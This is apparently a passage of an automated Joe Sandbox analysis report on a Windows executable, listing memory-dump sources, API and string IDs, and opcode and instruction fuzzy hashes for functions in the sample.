                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent$ClassName
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 2573188126-1403004172
                                                                            • Opcode ID: a8d2e2293dbfee37da9a2fe869a5b922080c116a80800c43aba43d92898523f5
                                                                            • Instruction ID: e000aad05c1661a730dd48483d4efe3cc50909806111e89a641c8e02ae5a24d8
                                                                            • Opcode Fuzzy Hash: a8d2e2293dbfee37da9a2fe869a5b922080c116a80800c43aba43d92898523f5
                                                                            • Instruction Fuzzy Hash: 60319735B18641C1EA20BB25E8545B8AB61FF89FE0FC44231DAAD077D5CF2CD5268760
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent$ClassName
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 2573188126-1403004172
                                                                            • Opcode ID: eaf651fc238b3aae00e08fe6209fec8bf8ab91120c705cf7cb7de3de14439670
                                                                            • Instruction ID: 731f13a401f5df24ca7204a576e760e5ce2f7c900ec7e5a37d7489e9ed2ee904
                                                                            • Opcode Fuzzy Hash: eaf651fc238b3aae00e08fe6209fec8bf8ab91120c705cf7cb7de3de14439670
                                                                            • Instruction Fuzzy Hash: E731B135B08A4182EA30BB65E8545F9AB61FF89FE0F844131DA9D03BD5DF2CE5268760
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                            • String ID:
                                                                            • API String ID: 2156557900-0
                                                                            • Opcode ID: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                                            • Instruction ID: 113f9b852da4f64179ca256c35e4e0a26fb8b38c54fe614f372fceb23cbd296e
                                                                            • Opcode Fuzzy Hash: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                                            • Instruction Fuzzy Hash: 42315B24B0D60386EB74BB35A854A39FBB1EF487E0F905534CD0A83654DE3DE8978670
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$MessagePostSleepThread$AttachCurrentInputProcessWindow
                                                                            • String ID:
                                                                            • API String ID: 685491774-0
                                                                            • Opcode ID: c5260aafb6a4b6d42d2605749b26c771a95cedda71831fed2f7dc5c01b1cab92
                                                                            • Instruction ID: eedca3886ca03f7a0625153f845cc5936ff8a94bee8bb15cbc7a8febb0ef340e
                                                                            • Opcode Fuzzy Hash: c5260aafb6a4b6d42d2605749b26c771a95cedda71831fed2f7dc5c01b1cab92
                                                                            • Instruction Fuzzy Hash: BC11A235B0450282F764BB76E85896D6A61AFCCBC0F805038C91E8BB50DE3DD5668360
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                            • API String ID: 0-1603158881
                                                                            • Opcode ID: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                                            • Instruction ID: a5f1709458737a2560f22f4c8e111cd797f47333c977389915fd367e2dff671a
                                                                            • Opcode Fuzzy Hash: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                                            • Instruction Fuzzy Hash: C412D362B19A4392EA7CAB31C855BF8E6A1BF547C4FC44531DA1D96290EF3CF563C220
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$Init$Clear
                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                                            • API String ID: 3467423407-1765764032
                                                                            • Opcode ID: 5cbe146a5ea3c13e5b9c23758e8e3c0c38d3cb360c4271411c28d686ea4a681f
                                                                            • Instruction ID: 17fc6fd9ccfd233a2026d66e119a75033bdd474f1fbd0cc078af017a04aab97c
                                                                            • Opcode Fuzzy Hash: 5cbe146a5ea3c13e5b9c23758e8e3c0c38d3cb360c4271411c28d686ea4a681f
                                                                            • Instruction Fuzzy Hash: 52A16F36A08B4286EB20AF75D4409ADBBA4FB88BD8F984132DE4D07B54DF3CD55AC750
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$CreateObjectStockwcscat
                                                                            • String ID: -----$SysListView32
                                                                            • API String ID: 2361508679-3975388722
                                                                            • Opcode ID: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                                            • Instruction ID: 1993a2498dd6042a60db15e22c3dcf8e7ac0b2bbaa9f5844a04fdc038132382f
                                                                            • Opcode Fuzzy Hash: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                                            • Instruction Fuzzy Hash: FC51B032A047819AE730EF35D888AD977A5FB84794F80013ADE5D47B55CF38D9A6C740
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameParentSend_invalid_parameter_noinfo
                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                            • API String ID: 2019164449-3381328864
                                                                            • Opcode ID: 8e262b819e6f56a90fb6f0dff8af3bf336551f9b4e3e960db18143356d212841
                                                                            • Instruction ID: fc800b4226d61dcdfdcc911ee48c216d2c2f628ee0bdf35097d066a74c96e44c
                                                                            • Opcode Fuzzy Hash: 8e262b819e6f56a90fb6f0dff8af3bf336551f9b4e3e960db18143356d212841
                                                                            • Instruction Fuzzy Hash: 18210022B1C50390FA70BB31E955AB9AB61AF85FC5FD04036C90E47695EE2CF5279720
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FreeString$FileFromLibraryModuleNamePathQueryType
                                                                            • String ID:
                                                                            • API String ID: 1903627254-0
                                                                            • Opcode ID: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                            • Instruction ID: 4c82d70b98ab15ebcbfe92e9fade02d3286789f25881ab71d26bede9016c7f63
                                                                            • Opcode Fuzzy Hash: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                            • Instruction Fuzzy Hash: 57023B62A08B8286DB60EF3AD4449ADAB60FBC4BC4F944032EB4E47764DF7CD55AC710
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                            • String ID:
                                                                            • API String ID: 3210457359-0
                                                                            • Opcode ID: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                                            • Instruction ID: 3e8f88fd5444c08fd0cde1a764b7bc4879874e548d53f0f342d69ef9b6a45ac7
                                                                            • Opcode Fuzzy Hash: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                                            • Instruction Fuzzy Hash: BC619525A086438AF774BB35D888FB9AB62BF807E4F904131D91D436D5CEBDE4639320
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                            • String ID:
                                                                            • API String ID: 1957940570-0
                                                                            • Opcode ID: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                                            • Instruction ID: 42f2c8a630aaa787696594ee1d9f96bfa10f205f7a1a5a5f639218a25ef71e59
                                                                            • Opcode Fuzzy Hash: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                                            • Instruction Fuzzy Hash: 42213C72519B4182E720EF62E84876ABBA0FB89FDAF844125DA8D07B64CF7CD1598710
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                            • String ID: SeDebugPrivilege
                                                                            • API String ID: 2533919879-2896544425
                                                                            • Opcode ID: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
                                                                            • Instruction ID: bc941fd8a5b19c81cf4d4b9b8364af651246b3fd70706da543ea5acf8c28d83a
                                                                            • Opcode Fuzzy Hash: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
                                                                            • Instruction Fuzzy Hash: 7A516F62A0874286EB20FB36C591B79BF60FF84BC5F858435D60D47A92DF7CE5268720
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                            • String ID: 2$P
                                                                            • API String ID: 93392585-1110268094
                                                                            • Opcode ID: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                                            • Instruction ID: 78c3d55628465ef4734eb175da710150defcbcc7afa01beed701d4a6f127c15b
                                                                            • Opcode Fuzzy Hash: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                                            • Instruction Fuzzy Hash: 9D51F432E04642A9F738AF71D441A7DBFA1BB407D8FA44135CA5A13A94CF3DD4A38722
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$LongMessageSend$Show
                                                                            • String ID: '
                                                                            • API String ID: 257662517-1997036262
                                                                            • Opcode ID: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
                                                                            • Instruction ID: d0ff32c16c29be0e78564a17c354bc91fe7ada0c1fa8266aac70beedd60f1259
                                                                            • Opcode Fuzzy Hash: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
                                                                            • Instruction Fuzzy Hash: 8551C432A0864281E374BB7AA894E7DAF50EB85FD0F964135DE5E03B90CE7DE4538720
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString$Messagewprintf
                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                            • API String ID: 4051287042-3128320259
                                                                            • Opcode ID: f7e86a73b67135bbf4198df281c36ffde702979d794fcff8f2d08bb660d9317c
                                                                            • Instruction ID: da7e74e1bd43495ea5cf1f0d6387e7ff9b208fa316233d93270520ad925739ad
                                                                            • Opcode Fuzzy Hash: f7e86a73b67135bbf4198df281c36ffde702979d794fcff8f2d08bb660d9317c
                                                                            • Instruction Fuzzy Hash: E5115271718B8691D734AB20F844BEAA764FF88784FC0503ADA4E43658DF7CD156C760
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                            • String ID:
                                                                            • API String ID: 1211466189-0
                                                                            • Opcode ID: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
                                                                            • Instruction ID: e40deb3bda8b2412728ee5259ce869f3f70a42b60e47f7d5728df2c8eaffd764
                                                                            • Opcode Fuzzy Hash: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
                                                                            • Instruction Fuzzy Hash: CCA10672718A9382E778BF359554B79BBA0FF84BC4F505135DA1A43AA0DF3CE8628710
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Close$BuffCharConnectDeleteOpenRegistryUpperValue
                                                                            • String ID:
                                                                            • API String ID: 50796853-0
                                                                            • Opcode ID: 18c6e7e98d25ee9453eb8a64695ba93ef2e4c35c66d04af6bd0c68575c4ce73f
                                                                            • Instruction ID: d9c6961c620bf4b85481facaedec44c3aaf1d4a6ac76dd3680307e621b85c569
                                                                            • Opcode Fuzzy Hash: 18c6e7e98d25ee9453eb8a64695ba93ef2e4c35c66d04af6bd0c68575c4ce73f
                                                                            • Instruction Fuzzy Hash: 9DB16F32B18A4286EB20EF75D4917BCAB60EF85BC4F844431EA4D57A96CF3CD526C760
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ShowWindow
                                                                            • String ID:
                                                                            • API String ID: 1268545403-0
                                                                            • Opcode ID: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
                                                                            • Instruction ID: 8ea936946a4d4679e61cb21911df995b4320e6d732023d3acee9d8d2865767d2
                                                                            • Opcode Fuzzy Hash: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
                                                                            • Instruction Fuzzy Hash: 0751C325E4C18298FB75BB389445B7CAF919F81BC4FD840B1C94E026D5CE6CF4A6C362
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 3864802216-0
                                                                            • Opcode ID: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                                            • Instruction ID: cd26259ef5cbbbcac67003ac12a355d1a7e7d447a7d2d80b36b517957e22d73b
                                                                            • Opcode Fuzzy Hash: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                                            • Instruction Fuzzy Hash: A4419C7661868187E7349F32B854B6ABBA0FB88BD1F504135EF9A47B54DF3CD4628B00
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                            • String ID:
                                                                            • API String ID: 3225163088-0
                                                                            • Opcode ID: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
